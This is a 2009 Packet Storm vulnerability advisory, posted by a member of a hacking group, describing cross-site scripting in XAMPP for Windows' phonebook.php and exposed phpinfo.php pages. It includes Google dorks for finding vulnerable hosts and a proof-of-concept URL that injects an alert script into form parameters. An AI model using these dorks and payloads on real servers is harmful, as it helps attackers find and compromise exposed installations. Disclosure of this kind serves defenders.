XAMPP For Windows Cross Site Scripting

2009-06-30T00:00:00
ID PACKETSTORM:78764
Type packetstorm
Reporter Cru3l.b0y
Modified 2009-06-30T00:00:00

Description

                                        
                                            `# XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability   
# AUTHOR : Cru3l.b0y  
# DATE : 05 APR 2009  
# SITE : WwW.DeltaHacking.Net  
# CONTACT : Cru3l.b0y@deltahacking.net  
  
#####################################################  
  
# APPLICATION : XAMPP for Windows  
# VERSION : 1.4.9 , 1.5.0 , 1.5.1 , 1.6.4  
# DOWNLO : http://www.apachefriends.org/en/xampp-windows.html  
# VENDOR : http://www.apachefriends.org/  
  
#####################################################  
  
[+] Xss:  
  
Dork : inurl:"/xampp/phonebook.php"  
Exploit :   
Vulnerability is in phonebook. First go to site.com/xampp/phonebook.php  
now write your script in First name or Phone number box and press ADD. Your script will run successfully.  
  
http://127.0.0.1/xampp/phonebook.php?lastname=Cru3l.b0y&firstname=<script>alert(123);</script>&phone=<script>alert(123);</script>  
  
  
[+] PHPinfo:  
  
Dork : inurl:"/xampp/phpinfo.php"  
Exploit : http://127.0.0.1/xampp/phpinfo.php  
##############################################################################################  
# Greeting: Dr.Trojan, Sasha, b3hz4d, PLATEN, black.viper and all member in DeltaHacking.Net #  
##############################################################################################`